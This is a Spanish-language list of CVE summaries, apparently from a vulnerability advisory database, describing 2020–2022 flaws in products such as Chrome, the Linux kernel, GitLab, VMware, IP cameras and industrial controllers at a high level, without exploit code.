    Una vulnerabilidad en la lectura de archivos arbitraria por medio de la función Export en el plugin GiveWP de GiveWP versiones anteriores a 2.20.2 incluyéndola, en WordPress
  • CVE-2022-34839
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/07/2022
    Fecha de última actualización: 08/08/2023
    Vulnerabilidad de Omisión de Autenticación en el plugin WP OAuth2 Server de CodexShaper versiones anteriores a 1.0.1 incluyéndola, en WordPress
  • CVE-2022-34540
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Digital Watchdog DW MEGApix IP cameras versión A7.2.2_20211029, contienen una vulnerabilidad de inyección de comandos en el componente /admin/vca/license/license_tok.cgi. Esta vulnerabilidad es explotable por medio de una petición POST diseñada.
  • CVE-2022-34539
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Digital Watchdog DW MEGApix IP cameras versión A7.2.2_20211029, contienen una vulnerabilidad de inyección de comandos en el componente /admin/curltest.cgi. Esta vulnerabilidad es explotable por medio de una petición POST diseñada.
  • CVE-2022-34538
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Digital Watchdog DW MEGApix IP cameras versión A7.2.2_20211029, contienen una vulnerabilidad de inyección de comandos en el componente /admin/vca/bia/addacph.cgi. Esta vulnerabilidad es explotable por medio de una petición POST diseñada.
  • CVE-2022-34534
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/07/2022
    Fecha de última actualización: 08/08/2023
    Digital Watchdog DW Spectrum Server versión 4.2.0.32842, permite a atacantes acceder a información confidencial por medio de una llamada API diseñada.
  • CVE-2022-36129
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/07/2022
    Fecha de última actualización: 08/08/2023
    Los clústeres de HashiCorp Vault Enterprise 1.7.0 a 1.9.7, 1.10.4 y 1.11.0 que utilizan Integrated Storage exponen un punto final de API no autenticado que podría ser abusado para anular el estado de votante de un nodo dentro de un clúster de Vault HA, introduciendo la posibilidad de una futura pérdida de datos o un fallo catastrófico. Corregido en Vault Enterprise 1.9.8, 1.10.5 y 1.11.1
  • CVE-2022-30270
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/07/2022
    Fecha de última actualización: 08/08/2023
    Motorola ACE1000 RTU versiones hasta 02-05-2022, presenta credenciales por defecto. Expone una interfaz SSH en el puerto 22/TCP. Esta interfaz es usada para el mantenimiento remoto y para las operaciones de transferencia de archivos SFTP que forman parte de la funcionalidad del software de ingeniería. El acceso a esta interfaz está controlado por 5 cuentas preconfiguradas (root, abuilder, acelogin, cappl, ace), todas ellas con credenciales por defecto. Aunque la documentación del ACE1000 menciona las cuentas root, abuilder y acelogin e instruye a usuarios para que cambien las credenciales por defecto, las cuentas cappl y ace permanecen sin documentar y, por lo tanto, es poco probable que sean cambiadas sus credenciales
  • CVE-2022-31205
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/07/2022
    Fecha de última actualización: 08/08/2023
    En los PLC de las series CS, CJ y CP de Omron versiones hasta 18-05-2022, la contraseña de acceso a la Interfaz de Usuario Web es almacenada en el área de memoria D1449...D1452 y puede leerse mediante el protocolo FINS de Omron sin necesidad de ninguna otra autenticación.
  • CVE-2022-30273
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/07/2022
    Fecha de última actualización: 08/08/2023
    El protocolo MDLC de Motorola versiones hasta 02-05-2022, maneja inapropiadamente la integridad de los mensajes. Soporta tres modos de seguridad: Simple, Encriptación Legada y Nueva Encriptación. En el modo Legacy Encryption, el tráfico es cifrado por medio del cifrado en bloque Tiny Encryption Algorithm (TEA) en modo ECB. Este modo de funcionamiento no ofrece la integridad de los mensajes y ofrece una confidencialidad reducida por encima del nivel de bloque, como demuestra un ataque ECB Penguin contra cualquier cifrado de bloque.
  • CVE-2022-1482
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/07/2022
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada de WebGL en Google Chrome versiones anteriores a 101.0.4951.41, permitía a un atacante remoto explotar potencialmente la corrupción de la pila por medio de una página HTML diseñada.
  • CVE-2022-1671
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/07/2022
    Fecha de última actualización: 04/08/2023
    Se ha encontrado un fallo de desreferencia de puntero NULL en la función rxrpc_preparse_s en el archivo net/rxrpc/server_key.c en el kernel de Linux. Este fallo permite a un atacante local bloquear el sistema o filtrar información interna del kernel.
  • CVE-2022-1651
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/07/2022
    Fecha de última actualización: 04/08/2023
    Se ha encontrado un fallo de pérdida de memoria en el kernel de Linux en la función acrn_dev_ioctl del archivo drivers/virt/acrn/hsm.c en la forma en que el modelo de dispositivo ACRN emula las NIC virtuales en la VM. Este fallo permite a un atacante local privilegiado filtrar información del kernel no autorizada, causando una denegación de servicio.
  • CVE-2022-34570
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2022
    Fecha de última actualización: 08/08/2023
    WAVLINK WN579 X3 versión M79X3.V5030.191012/M79X3.V5030.191012 contiene una fuga de información que permite a atacantes obtener la información de la clave por medio del acceso a la página messages.txt
  • CVE-2022-34529
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que WASM3 versión v0.5.0 contiene un fallo de segmentación por medio del componente Compile_Memory_CopyFill
  • CVE-2022-24406
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2022
    Fecha de última actualización: 08/08/2023
    OX App Suite versiones hasta 7.10.6, permite un ataque de tipo SSRF porque los límites de multipart/form-data son predecibles, y esto puede conllevar a una inyección en las llamadas internas de la API de Documentconverter
  • CVE-2022-1146
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/07/2022
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada en Resource Timing en Google Chrome versiones anteriores a 100.0.4896.60, permitía a un atacante remoto filtrar datos de origen cruzado por medio de una página HTML diseñada
  • CVE-2022-1139
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/07/2022
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada de Background Fetch API en Google Chrome versiones anteriores a 100.0.4896.60, permitía a un atacante remoto filtrar datos de origen cruzado por medio de una página HTML diseñada
  • CVE-2022-1138
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/07/2022
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada de Web Cursor en Google Chrome versiones anteriores a 100.0.4896.60, permitía a un atacante remoto que hubiera comprometido el proceso de renderización ocultar el contenido de la Omnibox (barra de URL) por medio de una página HTML diseñada
  • CVE-2021-22204
    Severidad: MEDIA
    Fecha de publicación: 23/04/2021
    Fecha de última actualización: 08/08/2023
    Una neutralización inapropiada de los datos del usuario en el formato de archivo DjVu en ExifTool versiones 7.44 y posteriores, permite una ejecución de código arbitrario cuando se analiza la imagen maliciosa
  • CVE-2022-1502
    Severidad: BAJA
    Fecha de publicación: 04/05/2022
    Fecha de última actualización: 08/08/2023
    Los permisos no eran verificados apropiadamente en la API en los proyectos que usaban el control de versiones en Git. Esto permitía que los proyectos fuesen modificados por usuarios con permisos únicamente de ProjectView
  • CVE-2022-1128
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/07/2022
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada de la API de Web Share en Google Chrome en Windows versiones anteriores a 100.0.4896.60, permitía a un atacante en el segmento de red local filtrar datos de origen cruzado por medio de una página HTML diseñada
  • CVE-2022-1874
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2022
    Fecha de última actualización: 08/08/2023
    Una aplicación insuficiente de la política en Safe Browsing en Google Chrome en Mac versiones anteriores a 102.0.5005.61, permitía a un atacante remoto omitir la política de protección de descargas por medio de una página HTML diseñada
  • CVE-2022-1867
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2022
    Fecha de última actualización: 08/08/2023
    Una comprobación insuficiente de las entradas no confiables en Data Transfer en Google Chrome versiones anteriores a 102.0.5005.61, permitía a un atacante remoto omitir la política de mismo origen por medio de un contenido del portapapeles diseñado
  • CVE-2022-34767
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/07/2022
    Fecha de última actualización: 08/08/2023
    Página web que "wizardpwd.asp" ALLNET Router modelo WR0500AC es propenso a una vulnerabilidad de omisión de autorización - la contraseña, ubicada en "admin" permite cambiar el http[s]://wizardpwd.asp/cgi-bin. No comprueba la identidad del usuario y puede ser accedido públicamente
  • CVE-2022-32430
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/07/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en Lin CMS Spring Boot versión v0.2.1, permite a atacantes acceder a la información y funciones del backend dentro de la aplicación
  • CVE-2021-46828
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/07/2022
    Fecha de última actualización: 08/08/2023
    En libtirpc versiones anteriores a 1.3.3rc1, los atacantes remotos podían agotar los descriptores de archivo de un proceso que usa libtirpc porque las conexiones TCP inactivas son manejadas inapropiadamente. Esto puede, a su vez, conllevar a un bucle infinito svc_run sin aceptar nuevas conexiones
  • CVE-2021-22640
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2022
    Fecha de última actualización: 08/08/2023
    Un atacante puede descifrar la contraseña de inicio de sesión de Ovarro TBox mediante la captura de comunicaciones y ataques de fuerza bruta
  • CVE-2021-39088
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2022
    Fecha de última actualización: 08/08/2023
    IBM QRadar SIEM versiones 7.3, 7.4 y 7.5, es vulnerable a una escalada de privilegios local, si esto pudiera combinarse con otras vulnerabilidades desconocidas, podría llevarse a cabo una escalada de privilegios. IBM X-Force ID: 216111
  • CVE-2022-24921
    Severidad: MEDIA
    Fecha de publicación: 05/03/2022
    Fecha de última actualización: 08/08/2023
    El archivo regexp.Compile en Go versiones anteriores a 1.16.15 y versiones 1.17.x anteriores a 1.17.8, permite un agotamiento de la pila por medio de una expresión profundamente anidada
  • CVE-2021-44717
    Severidad: MEDIA
    Fecha de publicación: 01/01/2022
    Fecha de última actualización: 08/08/2023
    Go versiones anteriores a 1.16.12 y versiones 1.17.x anteriores a 1.17.5 en UNIX, permite operaciones de escritura en un archivo no deseado o en una conexión de red no deseada como consecuencia de un cierre erróneo del descriptor de archivo 0 tras el agotamiento del descriptor de archivo.
  • CVE-2022-34568
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que SDL versión v1.2, contenía un uso de memoria previamente libarada por medio de la función XFree en el archivo /src/video/x11/SDL_x11yuv.c
  • CVE-2022-2477
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2022
    Fecha de última actualización: 12/08/2023
    Un uso de memoria previamente liberada en Guest View en Google Chrome versiones anteriores a 103.0.5060.134, permitía a un atacante que convenciera a un usuario de instalar una extensión maliciosa explotar potencialmente la corrupción de la pila por medio de una página HTML diseñada
  • CVE-2022-2481
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2022
    Fecha de última actualización: 12/08/2023
    Un uso de memoria previamente liberada en Views en Google Chrome versiones anteriores a 103.0.5060.134, permitía a un atacante remoto que convencía a un usuario de participar en interacciones de usuario específicas explotar potencialmente la corrupción de la pila por medio de una interacción de la Interfaz de Usuario
  • CVE-2022-2479
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2022
    Fecha de última actualización: 12/08/2023
    Una comprobación insuficiente de entradas no confiables en File en Google Chrome en Android versiones anteriores a 103.0.5060.134, permitía a un atacante que convenciera a un usuario de instalar una aplicación maliciosa obtener información potencialmente confidencial de directorios de archivos internos por medio de una página HTML manipulada
  • CVE-2022-22334
    Severidad: Pendiente de análisis
    Fecha de publicación: 01/08/2022
    Fecha de última actualización: 08/08/2023
    IBM Robotic Process Automation versiones 21.0.0, 21.0.1 y 21.0.2, podría permitir a un usuario acceder a información de un tenant a la que no debería tener acceso. IBM X-Force ID: 219391
  • CVE-2022-30616
    Severidad: Pendiente de análisis
    Fecha de publicación: 01/08/2022
    Fecha de última actualización: 08/08/2023
    IBM Robotic Process Automation versiones 21.0.0, 21.0.1 y 21.0.2, podría permitir a un usuario privilegiado elevar los privilegios a administrador de la plataforma mediante la manipulación de las API. IBM X-Force ID: 227978
  • CVE-2022-29078
    Severidad: ALTA
    Fecha de publicación: 25/04/2022
    Fecha de última actualización: 08/08/2023
    El paquete ejs (también se conoce como plantillas JavaScript Insertadas) versión 3.1.6 para Node.js, permite una inyección de plantillas del lado del servidor en settings[view options][outputFunctionName]. Esto es analizado como una opción interna, y sobrescribe la opción outputFunctionName con un comando arbitrario del Sistema Operativo (que es ejecutada al compilar la plantilla)
  • CVE-2022-35716
    Severidad: Pendiente de análisis
    Fecha de publicación: 01/08/2022
    Fecha de última actualización: 08/08/2023
    IBM UrbanCode Deploy (UCD) versiones 6.2.0.0 hasta 6.2.7.16, 7.0.0 hasta 7.0.5.11, 7.1.0.0 hasta 7.1.2.7 y 7.2.0.0 hasta 7.2.3.0, podrían permitir a un usuario autenticado obtener información confidencial en algunos casos debido a una comprobación de seguridad inapropiada. IBM X-Force ID: 231360
  • CVE-2022-26429
    Severidad: Pendiente de análisis
    Fecha de publicación: 01/08/2022
    Fecha de última actualización: 08/08/2023
    En cta, se presenta una posible forma de escribir registros de uso de permisos de una aplicación debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios sin necesidad de privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS07025415; ID de Incidencia: ALPS07025415
  • CVE-2022-26437
    Severidad: Pendiente de análisis
    Fecha de publicación: 01/08/2022
    Fecha de última actualización: 08/08/2023
    En httpclient, se presenta una posible escritura fuera de límites debido a datos no inicializados. Esto podría conllevar a una escalada remota de privilegios sin necesidad de privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del Parche: WSAP00103831; ID de Incidencia: WSAP00103831
  • Vulnerabilidad en las peticiones HTTPS en la interfaz de servicios web del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) (CVE-2021-40118)
    Severidad: ALTA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la interfaz de servicios web del software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado desencadenar una condición de denegación de servicio (DoS). Esta vulnerabilidad se debe a una validación de entrada inadecuada al analizar las solicitudes HTTPS. Un atacante podría explotar esta vulnerabilidad enviando una solicitud HTTPS maliciosa a un dispositivo afectado. Una explotación exitosa podría permitir al atacante hacer que el dispositivo se recargue, resultando en una condición de DoS
  • CVE-2022-21186
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 08/08/2023
    El paquete @acrontum/filesystem-template versiones anteriores a 0.0.2, es vulnerable a una inyección arbitraria de comandos debido a que la API fetchRepo no sanea el campo href de la entrada externa
  • CVE-2022-37415
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 08/08/2023
    El controlador Uniwill SparkIO.sys versión 1.0, es vulnerable a un desbordamiento del búfer en la región stack de la memoria por medio de IOCTL 0x40002008
  • CVE-2022-34527
    Severidad: Pendiente de análisis
    Fecha de publicación: 29/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que D-Link DSL-3782 versiones v1.03 y anteriores, contienen una vulnerabilidad de inyección de comandos por medio de la función byte_4C0160
  • CVE-2020-27815
    Severidad: MEDIA
    Fecha de publicación: 26/05/2021
    Fecha de última actualización: 28/07/2023
    Se encontró un fallo en el código del sistema de archivos JFS en el Kernel de Linux que permite que un atacante local con la capacidad de establecer atributos extendidos para poner en pánico al sistema, causando corrupción de memoria o una escalada de privilegios. La mayor amenaza de esta vulnerabilidad es la confidencialidad, la integridad y la disponibilidad del sistema
  • CVE-2020-25668
    Severidad: MEDIA
    Fecha de publicación: 26/05/2021
    Fecha de última actualización: 28/07/2023
    Se encontró un fallo en el Kernel de Linux porque el acceso a la variable global fg_console no está correctamente sincronizado, conllevando a un uso de la memoria previamente liberada en la función con_font_op
  • CVE-2022-30287
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2022
    Fecha de última actualización: 08/08/2023
    Horde Groupware Webmail Edition versiones hasta 5.2.22, permite un ataque de inyección de reflexión mediante el cual un atacante puede instanciar una clase de controlador. Esto conlleva a una deserialización arbitraria de objetos PHP
  • Vulnerabilidad en el proceso de actualización del software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD) (CVE-2021-1488)
    Severidad: ALTA
    Fecha de publicación: 29/04/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el proceso de actualización del software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD), podría permitir a un atacante autenticado local inyectar comandos que podrían ser ejecutados con privilegios root en el sistema operativo (SO) subyacente. Esta vulnerabilidad es debido a una comprobación insuficiente de entrada . Un atacante podría explotar esta vulnerabilidad al cargar un archivo de paquete de actualización diseñado a un dispositivo afectado. Una explotación con éxito podría permitir al atacante inyectar comandos que podrían ser ejecutados con privilegios root en el sistema operativo subyacente
  • Vulnerabilidad en la funcionalidad de análisis de la etiqueta del nombre de dominio de DNS en Nucleus 4, Nucleus NET, Nucleus RTOS, Nucleus ReadyStart, Nucleus Source Code SIMOTICS CONNECT 400, VSTAR (CVE-2020-27736)
    Severidad: MEDIA
    Fecha de publicación: 22/04/2021
    Fecha de última actualización: 08/08/2023
    Se ha identificado una vulnerabilidad en Nucleus NET (Todas las versiones), Nucleus ReadyStart V3 (Todas las versiones anteriores a V2017.02.3), Nucleus ReadyStart V4 (Todas las versiones anteriores a V4.1.0), Nucleus Source Code (Versiones que incluyen los módulos DNS afectados), SIMOTICS CONNECT 400 (Todas las versiones anteriores a V0.5.0.0). La funcionalidad de análisis de etiquetas de nombres de dominio DNS no valida correctamente los nombres terminados en cero en las respuestas DNS. El análisis sintáctico de las respuestas malformadas podría dar lugar a una lectura más allá del final de una estructura asignada. Un atacante con una posición privilegiada en la red podría aprovechar esta vulnerabilidad para provocar una condición de denegación de servicio o filtrar la memoria de lectura
  • Vulnerabilidad en la funcionalidad de descompresión de registros de nombres de dominio de DNS en Nucleus NET, Nucleus RTOS, Nucleus Source Code y VSTAR (CVE-2020-27009)
    Severidad: MEDIA
    Fecha de publicación: 22/04/2021
    Fecha de última actualización: 08/08/2023
    Se ha identificado una vulnerabilidad en Nucleus NET (Todas las versiones anteriores a V5.2), Nucleus Source Code (Versiones que incluyen los módulos DNS afectados). La funcionalidad de descompresión de registros de nombres de dominio DNS no valida correctamente los valores de desplazamiento del puntero. El análisis sintáctico de respuestas malformadas podría dar lugar a una escritura más allá del final de una estructura asignada. Un atacante con una posición privilegiada en la red podría aprovechar esta vulnerabilidad para ejecutar código en el contexto del proceso actual o provocar una condición de denegación de servicio
  • CVE-2022-30315
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2022
    Fecha de última actualización: 08/08/2023
    Honeywell Experion PKS Safety Manager (SM y FSC) versiones hasta 06-05-2022, presenta una verificación insuficiente de la autenticidad de los datos. De acuerdo con FSCT-2022-0053, se presenta un problema de controles de seguridad lógicos insuficientes en Honeywell Experion PKS Safety Manager. Los componentes afectados son caracterizados como: Honeywell FSC runtime (FSC-CPU, QPP), Honeywell Safety Builder. El impacto potencial es: Ejecución de código remota , denegación de servicio. La familia de controladores de seguridad Experion PKS de Honeywell usa el protocolo Safety Builder no autenticado (FSCT-2022-0051) para fines de ingeniería, incluyendo la descarga de proyectos y lógica de control al controlador. La lógica de control es descargada en el controlador bloque por bloque. La lógica que es descargada consiste en código FLD compilado a código máquina nativo para el módulo CPU (que es aplicado tanto a las familias Safety Manager como FSC). Como esta lógica no parece estar autenticada criptográficamente, permite a un atacante capaz de desencadenar una descarga de lógica ejecutar código máquina arbitrario en el módulo CPU del controlador en el contexto del tiempo de ejecución. Aunque los investigadores no han podido comprobarlo en detalle, creen que el microprocesador en el que son basados los módulos de la CPU del FSC y del Safety Manager es incapaz de ofrecer protección de memoria o capacidades de separación de privilegios, lo que daría a un atacante el control total del módulo de la CPU. No se presenta autenticación en la lógica de control descargada en el controlador. Es posible que carezca de capacidades de protección de memoria y separación de privilegios para el tiempo de ejecución. Los investigadores confirmaron los problemas en cuestión en Safety Manager versiones R145.1 y R152.2, pero sospechan que el problema afecta a todos los controladores FSC y SM y a las versiones de Safety Builder asociadas, independientemente de la revisión del software o del firmware. Un atacante que pueda comunicarse con un controlador Safety Manager por medio del protocolo Safety Builder puede ejecutar código arbitrario sin restricciones en el módulo de la CPU, lo que permite manipular de forma encubierta las operaciones de control e implantar capacidades similares a las del malware TRITON (MITRE ATT&CK software ID S1009). Un factor atenuante con respecto a algunas, pero no todas, las funcionalidades anteriores es que éstas requieren que el interruptor de llave físico del Safety Manager esté en la posición correcta
  • CVE-2022-1973
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 04/08/2023
    Se encontró un defecto de uso de memoria previamente liberada en el kernel de Linux en la función log_replay en el archivo fs/ntfs3/fslog.c en el diario NTFS. Este fallo permite a un atacante local bloquear el sistema y conlleva a un problema de filtrado de información del kernel
  • CVE-2022-31664
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 08/08/2023
    VMware Workspace ONE Access, Identity Manager y vRealize Automation contienen una vulnerabilidad de escalada de privilegios. Un actor malicioso con acceso local puede escalar los privilegios a "root"
  • CVE-2022-31661
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 08/08/2023
    VMware Workspace ONE Access, Identity Manager y vRealize Automation contienen dos vulnerabilidades de escalada de privilegios. Un actor malicioso con acceso local puede escalar los privilegios a "root"
  • CVE-2022-31660
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 08/08/2023
    VMware Workspace ONE Access, Identity Manager y vRealize Automation contienen una vulnerabilidad de escalada de privilegios. Un actor malicioso con acceso local puede escalar los privilegios a "root"
  • CVE-2022-31657
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 08/08/2023
    VMware Workspace ONE Access y Identity Manager contienen una vulnerabilidad de inyección de URL. Un actor malicioso con acceso a la red puede ser capaz de redirigir a un usuario autenticado a un dominio arbitrario
  • CVE-2022-31656
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 08/08/2023
    VMware Workspace ONE Access, Identity Manager y vRealize Automation contienen una vulnerabilidad de omisión de autenticación que afecta a usuarios del dominio local. Un actor malicioso con acceso de red a la interfaz de usuario puede obtener acceso administrativo sin necesidad de autenticarse
  • CVE-2022-2539
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab CE/EE afectando a todas las versiones a partir de 14.6 anterior a la 15.0.5, la 15.1 anterior a la 15.1.4 y la 15.2 anterior a la 15.2.1, que permitía a un miembro del proyecto filtrar las incidencias por contacto y organización
  • CVE-2022-2512
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab CE/EE afectando a todas las versiones a partir de 15.0 anteriores a 15.0.5, todas las versiones a partir de 15.1 anteriores a 15.1.4, todas las versiones a partir de 15.2 anteriores a 15.2.1. Los cambios de los miembros no son reflejados en los TODO de las notas confidenciales, lo que permite a antiguos miembros del proyecto leer las actualizaciones por medio de los TODO
  • CVE-2022-2459
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab EE afectando a todas las versiones anteriores a la 15.0.5, a todas las versiones a partir de 15.1 anteriores a 15.1.4 y a todas las versiones a partir de 15.2 anteriores a 15.2.1. Es posible que miembros invitados por correo electrónico sean unidas a un proyecto incluso después de que el propietario del grupo haya habilitado la configuración para evitar que los miembros sean añadidas a proyectos de un grupo, si la invitación es enviada antes de que sea habilitada la configuración
  • CVE-2022-2456
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab CE/EE afectando a todas las versiones anteriores a la 15.0.5, a todas las versiones a partir de 15.1 anteriores a 15.1.4 y a todas las versiones a partir de 15.2 anteriores a 15.2.1. Es posible que mantenedores de grupos o proyectos maliciosos cambien la visibilidad de su grupo o proyecto correspondiente al diseñar una petición POST maliciosa
  • CVE-2022-2303
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab CE/EE afectando a todas las versiones anteriores a la 15.0.5, a todas las versiones a partir de 15.1 anteriores a 15.1.4 y a todas las versiones a partir de 15.2 anteriores a 15.2.1. Puede ser posible a los miembros del grupo omitir la aplicación de 2FA habilitada a nivel de grupo al usar la concesión de credenciales de contraseña de propietario de recursos para obtener un token de acceso sin usar 2FA
  • CVE-2022-34307
    Severidad: Pendiente de análisis
    Fecha de publicación: 01/08/2022
    Fecha de última actualización: 08/08/2023
    IBM CICS TX versión 11.1, no establece el atributo de seguridad en los tokens de autorización o las cookies de sesión. Los atacantes pueden ser capaces de obtener los valores de las cookies enviando un enlace http:// a un usuario o plantando este enlace en un sitio al que el usuario vaya. La cookie será enviada al enlace inseguro y el atacante podrá entonces obtener el valor de la cookie al espiar el tráfico. IBM X-Force ID: 229436
  • CVE-2022-28572
    Severidad: MEDIA
    Fecha de publicación: 02/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AX1806 versión v1.0.0.1, contiene una vulnerabilidad de inyección de comandos en la función "SetIPv6Status"
  • CVE-2022-29582
    Severidad: MEDIA
    Fecha de publicación: 22/04/2022
    Fecha de última actualización: 08/08/2023
    En el kernel de Linux versiones anteriores a 5.17.3, el archivo fs/io_uring.c presenta un uso de memoria previamente liberada debido a una condición de carrera en la función io_uring timeouts. Esto puede ser desencadenado por un usuario local que no tenga acceso a ningún espacio de nombres de usuario; sin embargo, la condición de carrera quizás sólo pueda ser explotada con poca frecuencia
  • CVE-2022-35489
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/08/2022
    Fecha de última actualización: 08/08/2023
    En Zammad versión 5.2.0, los clientes que presentan asignadas organizaciones secundarias podían visualizar todas las organizaciones del sistema en lugar de sólo aquellas a las que están asignadas
  • CVE-2022-35488
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/08/2022
    Fecha de última actualización: 08/08/2023
    En Zammad versión 5.2.0, un atacante podía manipular la limitación de la tasa en la funcionalidad "forgot password" de Zammad, y así enviar muchas peticiones a una cuenta conocida para causar una Denegación de Servicio por medio de muchos correos electrónicos generados que también enviarían spam a la víctima
  • CVE-2022-35915
    Severidad: Pendiente de análisis
    Fecha de publicación: 01/08/2022
    Fecha de última actualización: 21/07/2023
    OpenZeppelin Contracts es una biblioteca para el desarrollo de contratos inteligentes seguros. El contrato objetivo de una consulta EIP-165 "supportsInterface" puede causar un consumo de gas no limitado al devolver muchos datos, mientras que generalmente es asumida que esta operación presenta un coste limitado. El problema ha sido solucionado en versión 4.7.2. Es recomendado a usuarios actualizar. No se presentan mitigaciones conocidas para este problema
  • CVE-2022-37434
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/08/2022
    Fecha de última actualización: 18/07/2023
    zlib versiones hasta 1.2.12, presenta una lectura excesiva de búfer en la región heap de la memoria o desbordamiento de búfer en el archivo inflate.c por medio de un campo extra del encabezado gzip. NOTA: sólo están afectadas las aplicaciones que llaman a inflateGetHeader. Algunas aplicaciones comunes agrupan el código fuente de zlib afectado pero pueden ser incapaces de llamar a inflateGetHeader (por ejemplo, véase la referencia nodejs/node)
  • CVE-2022-36997
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Veritas NetBackup versiones 8.1.x hasta 8.1.2, 8.2, 8.3.x hasta 8.3.0.2, 9.x hasta 9.0.0.1 y 9.1.x hasta 9.1.0.1 (y productos NetBackup relacionados). Un atacante con acceso autenticado a un cliente de NetBackup podría desencadenar de forma remota impactos que incluyen una lectura arbitraria de archivos, un ataque de tipo Server-Side Request Forgery (SSRF) y una denegación de servicio
  • CVE-2022-36800
    Severidad: Pendiente de análisis
    Fecha de publicación: 03/08/2022
    Fecha de última actualización: 08/08/2023
    Las versiones afectadas de Atlassian Jira Service Management Server y Data Center permiten a atacantes remotos sin el permiso "Browse Users" visualizar los grupos por medio de una vulnerabilidad de divulgación de información en el endpoint browsegroups.action. Las versiones afectadas son anteriores a 4.22.2
  • CVE-2022-29154
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en rsync versiones anteriores a 3.2.5, que permite a servidores remotos maliciosos escribir archivos arbitrarios dentro de los directorios de los pares conectados. El servidor elige qué archivos/directorios son enviados al cliente. Sin embargo, el cliente rsync no lleva a cabo una comprobación suficiente de los nombres de los archivos. Un servidor rsync malicioso (o un atacante de tipo Man-in-The-Middle) puede sobrescribir archivos arbitrarios en el directorio de destino del cliente rsync y en los subdirectorios (por ejemplo, sobrescribir el archivo .ssh/authorized_keys)
  • CVE-2022-23442
    Severidad: Pendiente de análisis
    Fecha de publicación: 03/08/2022
    Fecha de última actualización: 08/08/2023
